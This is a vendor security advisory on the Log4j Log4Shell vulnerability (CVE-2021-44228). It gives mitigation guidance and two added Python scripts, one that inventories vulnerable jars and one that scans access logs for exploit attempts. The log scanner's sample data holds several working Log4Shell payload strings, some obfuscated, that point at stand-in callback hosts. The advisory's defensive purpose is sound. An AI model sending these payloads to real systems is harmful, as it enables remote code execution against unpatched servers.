Log4j / High Severity Zero-Day Vulnerability

CVE-2021-44228 – Log4j

12.16.21

Update and Resources

This communication provides relevant updates and resources that clients should be aware of regarding the Log4j security flaw.

Binary Defense MDR is NOT IMPACTED by this vulnerability.

Binary Defense and our sister company TrustedSec have collaborated to provide guidance about Log4j in the blogs and webcast linked below. For convenience, we have also included Log4j direction from our SIEM partners.

As an extension to your security team, we expect to confidently get through this recent vulnerability together. If you need any additional assistance, please contact our Customer Success team.

Jen Campbell
Customer Success Manager
jen.campbell@binarydefense.com

Binary Defense and TrustedSec Resources:

SIEM Partner Resources:


High Severity Zero-Day Vulnerability

CVE-2021-44228 Affects Apache Log4j

12.10.21

A zero-day vulnerability in the widely used Java logging library Apache Log4j is already being exploited in the wild, and a proof-of-concept (POC) exploit has been published on GitHub. The flaw allows unauthenticated remote code execution: an attacker who can get a crafted string into any value the application logs can take full control of the server. Log4j versions 2.0 through 2.14.1 are affected, and so is any Java application or product that bundles one of those versions, whether or not its own developers wrote the logging code. Researchers from LunaSec wrote a blog post stating “Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We’re calling it “Log4Shell” for short.”

Analyst Notes:

Researchers advise that organizations running the affected versions of Apache Log4j investigate for possible compromise, and upgrade to log4j-2.15.0-rc1 (or the final 2.15.0 release once it is available) as soon as possible. If immediate patching is not possible, a temporary mitigation is available:

Set the log4j2.formatMsgNoLookups system property to true when starting the Java Virtual Machine, by adding the following option to the java command line:

-Dlog4j2.formatMsgNoLookups=true

The equivalent environment variable, LOG4J_FORMAT_MSG_NO_LOOKUPS=true, has the same effect. Note that this property is only honored by Log4j 2.10 and later; for older 2.x versions the workaround is to remove the JndiLookup class (org/apache/logging/log4j/core/lookup/JndiLookup.class) from the log4j-core jar on the classpath. Either measure is a stopgap until the upgrade is applied, and every JVM that loads the vulnerable library must be restarted for it to take effect.
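To turn the mitigation guidance above into a repeatable check across many hosts, here is an added example in Python (not Binary Defense, TrustedSec or Apache code). It inventories log4j-core jars under a directory, reads each jar's version from its manifest, checks whether the JndiLookup class is present, and maps the result onto the three options: upgrade, set the property, or remove the class. The jar-name pattern, the version threshold and the sample jars built by demo() are assumptions made for this example; the sample jars are constructed stand-ins, not real Log4j artifacts.

```python
"""Inventory check for CVE-2021-44228 exposure across a directory tree.

Added example for this advisory; it is not Binary Defense, TrustedSec or Apache code.
It finds log4j-core jars, reads the version from the jar manifest, checks whether the
JndiLookup class is present, and recommends which of the advisory's options applies:
  - version >= 2.15.0         : patched per the advisory's upgrade guidance
  - 2.10 <= version < 2.15.0  : vulnerable; -Dlog4j2.formatMsgNoLookups=true is a valid stopgap
  - version < 2.10            : vulnerable; the property does not exist, so remove JndiLookup.class
The jars built by demo() are constructed stand-ins, not real Log4j artifacts.
"""
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
VERSION_RE = re.compile(r"^Implementation-Version:\s*(\S+)", re.M)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Pre-release tags are ignored."""
    parts = []
    for piece in text.split(".")[:3]:
        m = re.match(r"\d+", piece)
        parts.append(int(m.group()) if m else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def assess_jar(path):
    """Return version, JndiLookup presence, status and recommended action for one jar."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            m = VERSION_RE.search(manifest)
            if m:
                version = m.group(1)
    has_jndi = JNDI_CLASS in names
    ver = parse_version(version) if version else None

    if not has_jndi:
        status, action = "mitigated", "JndiLookup.class is absent; still schedule the upgrade"
    elif ver is None:
        status, action = "unknown", "no Implementation-Version in manifest; inspect manually"
    elif ver >= (2, 15, 0):
        status, action = "patched", "none"
    elif ver >= (2, 10, 0):
        status, action = "vulnerable", "upgrade, or restart the JVM with -Dlog4j2.formatMsgNoLookups=true"
    else:
        status, action = "vulnerable", "upgrade, or delete JndiLookup.class from the jar (property unsupported before 2.10)"
    return {"path": path, "version": version, "jndi_lookup_present": has_jndi,
            "status": status, "action": action}


def find_log4j_jars(root):
    """Yield paths of files under root whose names look like log4j-core jars."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.startswith("log4j-core") and name.endswith(".jar"):
                yield os.path.join(dirpath, name)


def scan(root):
    """Assess every log4j-core jar under root, in path order."""
    return [assess_jar(p) for p in sorted(find_log4j_jars(root))]


def make_sample_jar(path, version, include_jndi=True):
    """Write a minimal constructed jar with a manifest and (optionally) a JndiLookup.class stub."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF",
                     "Manifest-Version: 1.0\nImplementation-Version: %s\n" % version)
        if include_jndi:
            jar.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only; a stand-in


def demo():
    """Build four constructed jars in a temp tree and return scan() over them."""
    root = tempfile.mkdtemp()
    make_sample_jar(os.path.join(root, "app1", "log4j-core-2.14.1.jar"), "2.14.1")
    make_sample_jar(os.path.join(root, "app2", "log4j-core-2.8.2.jar"), "2.8.2")
    make_sample_jar(os.path.join(root, "app3", "log4j-core-2.14.1.jar"), "2.14.1", include_jndi=False)
    make_sample_jar(os.path.join(root, "app4", "log4j-core-2.15.0.jar"), "2.15.0")
    return scan(root)


if __name__ == "__main__":
    for result in demo():
        print(result["status"].upper(), result["path"], "->", result["action"])
```

Two caveats when running this for real: it only sees log4j-core jars that sit on disk under their own name, so application fat jars, WAR/EAR archives and vendor appliances that repackage the classes need to be unpacked and scanned separately; and the 2.15.0 threshold encodes the advisory's guidance as of 12.10.21, so check the current Apache recommendation before treating a jar as "patched".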

Analysis for this vulnerability is ongoing as more information is discovered.

For Binary Defense MDR and SIEM customers, we are actively monitoring the situation, and the SOC is operating at a heightened level of vigilance, looking for exploitation attempts and post-exploitation activity related to this exposure.
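The exploit string described above ends up in whatever the application logs, so the first place to hunt for attempts is the web server access log. The following is an added example in Python (not Binary Defense SOC content) that scans access-log lines for JNDI lookup strings, including URL-encoded and nested-lookup obfuscations, and extracts the callback host so the SOC can pivot to outbound connections. The log lines in SAMPLE_LOG are constructed, the callback hosts in them are documentation addresses, and the obfuscation forms handled are assumptions about what to expect, not a complete list.

```python
"""Flag Log4Shell (CVE-2021-44228) probe strings in web server access logs.

Added example for this advisory, not Binary Defense SOC content. The access-log lines in
SAMPLE_LOG are constructed; the callback hosts in them are documentation addresses.
The injected string is "${jndi:<scheme>://<host>/...}". Probes hide it behind URL-encoding
and nested lookups such as ${lower:j} or ${::-j}; normalise() undoes those before the
final match so the obfuscated forms are caught as well.
"""
import re
from urllib.parse import unquote

# Innermost ${...} with no nested lookup inside it.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# ${jndi:scheme://target...}; the target is captured up to the next '/', '}' or whitespace.
_JNDI = re.compile(r"\$\{jndi:([a-z]+):/*([^/}\s]+)", re.I)


def _resolve(m):
    """Collapse one obfuscating lookup to its literal text; leave anything else untouched."""
    body = m.group(1)
    if body.lower().startswith(("lower:", "upper:")):
        return body.split(":", 1)[1]        # ${lower:j} -> j
    if ":-" in body:
        return body.split(":-", 1)[1]       # ${::-j} -> j, ${env:NOPE:-j} -> j
    return m.group(0)                       # ${jndi:...} and unknown lookups stay as they are


def normalise(text, max_rounds=20):
    """Decode URL-encoding (twice, for double-encoded probes) and flatten nested lookups."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        flattened = _INNERMOST.sub(_resolve, text)
        if flattened == text:
            break
        text = flattened
    return text


def find_jndi(line):
    """Return [(scheme, target), ...] for every JNDI callback found in one log line."""
    return [(scheme.lower(), target) for scheme, target in _JNDI.findall(normalise(line))]


def scan_log(lines):
    """Return one hit dict per JNDI callback, with the 1-based line number it came from."""
    hits = []
    for number, line in enumerate(lines, 1):
        for scheme, target in find_jndi(line):
            hits.append({"line": number, "scheme": scheme, "target": target})
    return hits


# Constructed sample access log: benign traffic plus probes in the User-Agent and query string.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Dec/2021:14:05:41 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '198.51.100.24 - - [10/Dec/2021:14:06:02 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example%2Fx%7D HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '198.51.100.25 - - [10/Dec/2021:14:07:19 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://callback.example:1389/b}"',
    '198.51.100.26 - - [10/Dec/2021:14:08:33 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://callback.example/c}"',
    '198.51.100.27 - - [10/Dec/2021:14:09:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap://callback.example/d}"',
    '10.0.0.9 - - [10/Dec/2021:14:09:40 +0000] "GET /search?q=${price} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("line %(line)d: %(scheme)s callback to %(target)s" % hit)
```

A hit is evidence of an attempt, not of compromise: the string is only dangerous if it reached a vulnerable Log4j instance. Confirm by looking for outbound LDAP or RMI connections from the application host to the extracted target around the same timestamp, and block those targets at egress while the upgrade is rolled out. Any logged field can carry the payload, so run the same scan over application logs, not just the web tier.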

Sources:

https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/

https://www.randori.com/blog/cve-2021-44228

https://www.lunasec.io/docs/blog/log4j-zero-day/